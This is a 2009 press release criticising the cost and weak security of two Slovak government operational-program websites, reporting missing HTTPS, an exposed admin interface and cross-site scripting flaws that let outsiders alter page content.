Analysis of Security of Operational Programs' Internet Websites
| Date: 2009-11-02
(Reaction to Statements of Construction Minister Igor Stefanov)
On November 30 2009, the Conservative Institute of M. R. Stefanik presented at a news conference outrageous purchase prices of websites for operational programs. The two most expensive pages, www.nsrr.sk a www.ropka.sk, fall under the competencies of Slovakia's Ministry of Construction and Regional Development. According to statements of Construction Minister Igor Stefanov from November 1 by which he wanted to advocate the grounds for the websites' costs, they were expensive due to their security.
We consider such explanation as poor and insufficient. The websites are incredibly overpriced, and as the construction minister justified the costs with their security, we looked into the matter. We were shocked by our findings. In their context, the wasting of public funds is even more visible, as is the lack of professionalism of the selected contractors.
- The first finding was presented at the news conference held on November 30: the sites are located on servers in the Czech Republic1 in spite of the fact that the government has at its disposal its own high quality IT infrastructure. Also, such services can be easily procured in Slovakia. Since the websites are primarily designated for Slovak visitors, we consider their location in a neighboring country as inefficient and unreasonable.
According to the minister' statement, the webpage also contains an important reservation system. In spite of its importance, neither this system, nor any other part of the webpage is secured by a Hypertext Transfer Protocol Secure (HTTPS). If a HTTPS is not applied, all data, including the login and password are transferred in an unencrypted form and they may easily be sniffed and exploited by a potential attacker.
The HTTPS is nowadays used not only to protect sites of Internet banking, but also the most common web, such as mail and chat servers. The use of HTTPS is the basic pillar of Internet security. It is pitiable that such an important security pillar was somehow omitted in the procurement procedures.
As the website's setup interface2 itself is not protected or secured, there is a real risk of a misuse of the interface, as the result of which the ministry may lose control over the contents of its own website. The third point will show that unfortunately, the ministry has already lost control over its site.
The third point presents the most serious findings, that we consider to be bad enough to serve as grounds for filing a complaint to the supplier or withdrawing from the purchase contract. The websites contain several shortcomings, the so-called “Cross-Site Scripting” security vulnerability, or XSS3.
As a result of these vulnerabilities, anyone can insert pictures, text and components in the page without needing special hackers or programming skills. An Internet user may invade the site from his/her own computer, to which also a participant in the discussion forum of the SME daily on www.sme.sk4 pointed out. An unknown participant in the discussion inserted a picture of a railway tunnel5 in the www.ropka.sk website, while the www.nsrr.sk suffers from the same vulnerability (see appendix 1 and 2) and possibly also other sites from the same supplier.
A bigger problem is that not just innocent playing around with a picture is in question. A virus component or a harmful code may be injected in the page in the same way. A potential attacker may also redirect a user to his/her own site (the so-called phishing site6), appearing to be the original site. The attacker may thus present false or incorrect data or try to acquire data from visitors (personal data, sensitive data, logins, passwords) who believe are on the original page.
The aforementioned flaws represent serious security vulnerabilities in the light of which the supplier seem to be unprofessional and the ministry failed to check the supplied product. The websites are resistant to trivial attacks. Unless a prompt correction of the flaws is carried out, it is just a matter of time when they will be misuses in a serious way.
We think it is high time to stop persuading the public about the advantages and quality of the product, and to take action. The website www.ropka.sk worth over SKK 2 million (EUR 76,000) is like a car without brakes: it works, drives, but it is very dangerous for us.
For more information or technical details, please contact:
The author of the press release participated in the press conference organized by the Conservative Institute of M. R. Stefanik.
Location of the Websites in the Czech Republic:
The Website's Setup Interface:
- http://www.nsrr.sk/admin (in operation, without HTTPS)
- https://www.nsrr.sk/admin (HTTPS not in operation)
Detailed Description of the XSS vulnerability:
Little Joke by an Anonymous Discussion Participant:
Little Joke by an Anonymous Discussion Participant - Links:
Explanation and possibilities of the use of the so-called “phishing” page:
Altered websites of the operational programs:
(click on the pictures to see in the full size)